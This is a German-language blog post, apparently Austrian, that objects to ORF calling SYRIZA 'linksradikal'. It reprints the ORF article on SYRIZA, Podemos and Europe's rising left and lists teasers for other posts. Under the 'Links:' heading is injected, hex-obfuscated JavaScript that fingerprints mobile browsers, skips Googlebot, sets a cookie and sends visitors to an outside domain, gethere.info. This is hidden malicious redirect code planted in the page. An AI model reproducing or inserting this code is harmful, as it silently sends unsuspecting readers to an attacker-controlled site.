Menü

Kommen erstmals Linksradikale an die Macht? – so der ORF vor einigen Tagen.

Vor einigen Tagen war das auf der ORF-website zu lesen – hier der Link: http://orf.at/stories/2261484/2261485/
Sollte der Link aber (aus irgendeinem Grund) bald nicht mehr funktionieren, gibt es den geamten Artikel am Ende.
Warum ich das ins Netz stelle. Das Wort „linksradikal“ hat mich irritiert, denn ich hatte meine eigene Vorstellung, was „linksradikal“ ist oder sein könnte. Kurz, ich habe es – zumindest – mit Gewaltbereitschaft in Zusammenhang gebracht. Wo ich offensichtlich richtig liege, da beim googeln das auch so herauskam. Und dann sah ich mir zum gleichen Thema unterschiedliche und bekannte Medien an – Spiegel, Presse, Die Zeit, Der Standard – und fand nur beim ORF und beim Der Spiegel den Ausdruck „linksradikal“. Mit solcher Wortwahl der öffentlich rechtliche ORF. Jedenfalls werde ich die Chance ergreifen und am Mittwoch, den 21. Jänner ins Klagenfurter VOLXHAUS gehen und den Worten des Syriza-Politikers Giorgos Chondros lauschen, welcher sich lt. Medien auf einer sogenannten Charmeoffensiv-Tour befindet (siehe dazu den Artikel aus der Presse).
Und ich bezweifle, ob man die diesbezügliche Berichterstattung als journalistisch seriös bezeichnen kann. Eher tendenziös. Eigentlich zum Schämen.
Links zu den oben zitierten Medien hier:

http://www.zeit.de/wirtschaft/2012-06/griechenland-interview-varoufakis
http://www.spiegel.de/politik/ausland/umfrage-sieht-syriza-partei-in-griechenland-vorne-a-835097.html
http://diepresse.com/home/politik/eu/4637865/SyrizaPartei_Sind-keine-Terroristenpartei
http://derstandard.at/2000010545014/Syriza-auf-32-Prozent

Und hier der ORF-Artikel:

Tsipras: „Nur der Anfang des Wandels“

In Griechenland stehen für die Koalition der Radikalen Linken (SYRIZA) im Vorfeld der Wahl die Zeichen auf Erfolg. Brüssel und Berlin warnen die Griechen vor einer falschen Entscheidung – schließlich drohe ein Zerwürfnis mit den Gläubigern. Doch auch die Regierung in Madrid zittert dem Urnengang entgegen – schließlich drohen auch ihnen Wahlschlappen.

Umso mehr bemüht sich der griechische Linkspolitiker Alexis Tsipras, die spanische Linke im Sog des möglichen Erfolgs mitzuziehen. So sieht Tsipras einen möglichen Sieg seiner SYRIZA-Partei bei der Parlamentswahl am 25. Jänner als Auftakt für eine ähnliche Entwicklung in Spanien. In einem am Freitag veröffentlichten Beitrag für die spanische Zeitung „El Pais“ schreibt Tsipras, der Sieg seiner Linksallianz werde einen „neuen und hoffnungsvollen Weg“ für Spanien eröffnen.

Linke laut Umfragen an der Spitze

Der Hintergrund für die öffentlichkeitswirksamen Prognosen des griechischen Linken in der größten spanischen Zeitung ist schnell erklärt und basiert auf einer gemeinsamen Welle des Erfolgs: SYRIZA ist mit der spanischen Partei Podemos („Wir können“) verbündet, die erst vor einem Jahr aus der gleichnamigen Protestbewegung hervorgegangen ist und vom bekannten TV-Journalisten Pablo Iglesias angeführt wird.

Beide Parteien liegen in den Meinungsumfragen seit geraumer Zeit voran, Podemos kommt in Umfragen für die Parlamentswahl, die noch heuer stattfindet, auf gut 28 Prozent. Die Hauptgemeinsamkeit der Parteien ist das Auflehnen gegen den von den jeweiligen Regierungen verordneten Sparkurs. Vor der Podemos-Gründung waren die „Empörten“ („Indignados“) monatelang auf die Straße gegangen.

Bei der Europawahl im Mai 2014 gelang Podemos ein Überraschungserfolg mit knapp acht Prozent der Stimmen. Mit 200.000 Mitgliedern hat sie mittlerweile die Sozialisten überholt, nur die regierende Volkspartei hat mehr Mitglieder. Zu den Forderungen der Partei zählen die Einführung der 35-Stunden-Woche und die Senkung des Pensionsalters auf 60 Jahre.

Eindeutige Signale

Doch der Beistand ist keinesfalls einseitig. So kamen diese Woche auch aus Spanien Signale der linken Solidarität: Podemos-Chef Iglesias rief die Griechen in einem von SYRIZA verbreiteten Video auf Englisch dazu auf, für SYRIZA zu stimmen. Griechenlands Wähler hätten die Wahl zwischen der „Kandidatin mit dem Namen Angela Merkel“, vertreten durch die derzeitige Regierung, und Tsipras.

Zwar erwähnte Tsipras Podemos in seinem Zeitungsbeitrag nicht explizit. Er vertritt darin aber die Ansicht, dass Griechenland „nur der Anfang des Wandels“ sei, der aus Südeuropa komme und „bald auch Spanien“ erreichen werde. „Die Niederlage der politischen Auftraggeber der Sparpolitik, der Unsicherheit, der Korruption und der Skandale beginnt in unseren Ländern“, heißt es in dem Beitrag.

Samaras ein „echter Leader“

Gegenseitigen Beistand gab es zuletzt gleichermaßen auf Regierungsebene – am Mittwoch hatte Spaniens konservativer Regierungschef Mariano Rajoy bei einem Besuch in Athen dem griechischen Ministerpräsidenten Antonis Samaras und dessen rechtskonservativer Partei Nea Dimokratia gegen SYRIZA den Rücken gestärkt. Die Reformen in Griechenland und Spanien „tragen Früchte“, sagte Rajoy nach dem Treffen mit Samaras im griechischen TV.

Der Wohlstand kehre langsam zurück, so Rajoy weiter. Anschließend wurden gar Rosen gestreut: Er, Rajoy, sei Zeuge der „dynamischen Bemühungen“ von Samaras, sein Land aus der Krise zu führen. Samaras sei ein echter „Leader“, hieß es vom spanischen Regierungschef. Sowohl Griechenland als auch Spanien, die gerade aus der schweren Finanzkrise herauskämen, bräuchten „Stabilität“ und keine „Verunsicherung“, so Rajoy.

Kommen erstmals Linksradikale an die Macht?

Der SYRIZA-Chef Tsipras geht seit längerem mit der Forderung nach einem Ende der Sparpolitik in der EU in die Offensive. Infolge der Wirtschaftskrise war aus dem ehemals unbedeutenden Bündnis kleiner linker Gruppen eine Protestpartei mit realer Chance auf die Regierungsmacht erwachsen. So führte die Partei mit ihrer Blockade der Präsidentenwahl Ende 2014 vorgezogene Neuwahlen herbei. Bei einem Wahlsieg könnte in der EU erstmals eine linksradikale Partei eine Regierung führen.

Aufstrebende Linke in Südeuropa

Gleichzeitig gibt es in mehreren südlichen EU-Ländern aufstrebende bzw. neue linke Parteien. Dazu zählt beispielsweise Italien, wo sich Linksparteien und Nichtregierungsorganisationen (NGOs) zum Bündnis „Das andere Europa mit Tsipras“ zusammenschlossen, um die Kandidatur Tsipras’ für das Amt des Kommissionspräsidenten zu unterstützen. Das Bündnis kam auf vier Prozent der Stimmen und schickte drei Abgeordnete ins EU-Parlament.

Auch in Slowenien und Kroatien gibt es neue Bündnisse, die sich etwa im Falle Sloweniens als Vereinigte Linke (Zdruzena levica) für „demokratische Kontrolle“ der Banken, die Tobin-Steuer, Schuldenschnitte für die Krisenstaaten und die Schaffung von Eurobonds aussprechen. In Kroatien fordert die Partei Lebendige Mauer (Zivi zid) „die Wiederherstellung der währungspolitischen Souveränität“ des Landes, dessen Notenbank nur noch eine „Wechselstube“ (der Europäischen Zentralbank, Anm.) sei. Konkret fordert die Partei auch die Streichung von 70 Prozent der Auslandsschulden.

Links:

var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Blog / Zeitgeschehen

Griechenland: SYRIZAs Dilemma und die verlogenen Reaktionen in Deutschland

am Fr, 30.01.2015 um 11:01
annotazioni.de – Blog zu wirtschafts-, verteilungs- und sozialpolitischen Themen Gregor Kritidis, Patrick Schreiner, 28. Januar 2015 | Ausgrenzung, Demokratie & Recht, Wirtschaft & Finanzen Dass die griechische Linkspartei SYRIZA einen fulminanten Wahlsieg landete, ist mehr als erfreulich. Es ist ein klares und deutliches Signal an Brüssel und Berlin, dass die griechischen WählerInnen die bisherige Austeritäts- […]

Religionen: Respekt? Wovor denn?

am Fr, 16.01.2015 um 11:16
©Die Zeit Respekt vor religiösen Gefühlen!, heißt es allenthalben. Michael Schmidt-Salomon hält es für falsch, auf die Befindlichkeiten von Gläubigen groß Rücksicht zu nehmen. VON MICHAEL SCHMIDT-SALOMON Eine Kirche und eine Moschee in Ramallah, Westjordanland  |  © Mohamad Torokman/Reuters Es wirkt wie ein bedingter Reflex: Kaum gehen religiöse Fanatiker auf die Barrikaden , sind westliche Politiker und Journalisten zur […]

Verwaltung des Stillstandes statt überfälliger Reformen

am Mi, 07.01.2015 um 16:52
Verwaltung des Stillstandes statt überfälliger Reformen Zangengriff von Parteien und Kammern lähmt Österreich Österreich ist immer noch eines der reichsten Länder Europas, verliert aber seit 2007/08 in allen Standort- und Wettbewerbsvergleichen kontinuierlich an Boden. Das Land braucht einen Befreiungsschlag. Matthäus Kattinger, Wien 1.1.2015, 05:30 Uhr Hypo Alpe Adria in Klagenfurt: Das Hypo-Desaster sollte für notwendige […]

Statistische Tricks – ÖSTERREICHS LUKRATIVE ARBEITSLOSE

am Do, 15.05.2014 um 13:30
Statistische Tricks Österreichs lukrative Arbeitslose Matthäus Kattinger, Wien, Gestern, 14. Mai 2014, 13:31 Der staatliche Arbeitsmarktservice (AMS) ist fest in der Hand rot-schwarzer Proporz-Politik.(Bild: Imago) Österreich ist bei der Langzeitarbeitslosigkeit nur dank statistischen Tricks Musterknabe. Schlimmer noch ist die Geschäftemacherei auf dem Rücken der Arbeitslosen. Ein 62-jähriger Personalchef wird 53 Tage vor Pensionsantritt vom Arbeitsamt in […]

BERNIE SANDERS – The 67 Richest Are as Wealthy as the World“s Poorest 3.5 Billion

am Do, 15.05.2014 um 13:25
http://www.sanders.senate.gov/newsroom/must-read/67-richest-wealthy-poorest-billion The 67 Richest Are as Wealthy as the World“s Poorest 3.5 Billion By: Kasia Moreno Forbes Wednesday, March 26, 2014 TAKE THE POLL:ARE WEALTH AND INCOME DISTRIBUTED FAIRLY IN THE UNITED STATES? OxfamInternational, a poverty fighting organization, made news at the World Economic Forum in Davos earlier this year with its report that the […]

HYPOLITERATUR und weiteres MATERIAL

am So, 16.02.2014 um 20:32
http://diepresse.com/layout/diepresse/files/dossiers/hypo/index.html http://www.neopresse.com/finanzsystem/die-hypo-alpe-adria-bank-und-der-krieg-am-balkan/ http://www.profil.at/articles/1412/980/373667/hypo-folgen-wie-kaernten http://www.krone.at/Oesterreich/Das_Hypo-Dossier._das_niemand_sehen_durfte-Insolvenz_empfohlen-Story-397720 http://www.krone.at/Oesterreich/Kaerntens_Ex-LH_Doerfler_Es_ist_kalt_im_Land-Krone-Interview-Story-395411 http://www.format.at/articles/1409/930/373123/ex-hypo-vorstandschef-tilo-berlin-leben-rechnung-bank http://www.nzz.ch/wirtschaft/wirtschafts-und-finanzportal/oesterreichs-filz-als-humus-fuer-die-hypo-pleite-1.18243800 http://www.kleinezeitung.at/nachrichten/wirtschaft/hypo/3549303/sieben-todsuenden-bei-hypo.story Wirtschaftsblatt Der Standard – http://dst.at/1gvvZjq http://diepresse.com/home/wirtschaft/economist/1561422/Die-Profiteure-der-Kaerntner-HypoPleite http://deutsche-wirtschafts-nachrichten.de/2013/09/27/wer-wirklich-regiert-oesterreichs-version-von-goldman-sachs-heisst-raiffeisen/ http://www.salzburg.com/nachrichten/oesterreich/wirtschaft/sn/artikel/hypo-debakel-ein-haus-fuer-jeden-villacher-94181/?no_cache=0 http://www.format.at/articles/1306/931/352139/das-erfolgsrezept-island-wir-banken https://secure.avaaz.org/de/petition/Oesterreichische_Bundesregierung_Kein_Steuergeld_mehr_fuer_private_Banken/?fFmLzbb&pv=4 http://ninatomaselli.wordpress.com/2014/02/13/hypo-alpe-adria-republik-osterreich-is-this-your-poker-face/ http://www.krone.at/Oesterreich/Haider_damals_ueber_Hypo_Kaernten_wird_reich!-Traeume_jaeh_zerplatzt-Story-393076? http://stressfaktor.squat.net/2000/haider.html ————————————- Serie „Die Akte Hypo“ Bereicherung und Balkangeschäfte hinter Stiftungsschleiern, Verlust-Exzesse bis zum Beinahe-Ruin. Der Krimi um die Hypo Alpe-Adria. Die Serie zum Mega-Debakel der Kärntner Landesbank. Teil 1: Hallo Hypo: Kredit auf Anruf Haiders […]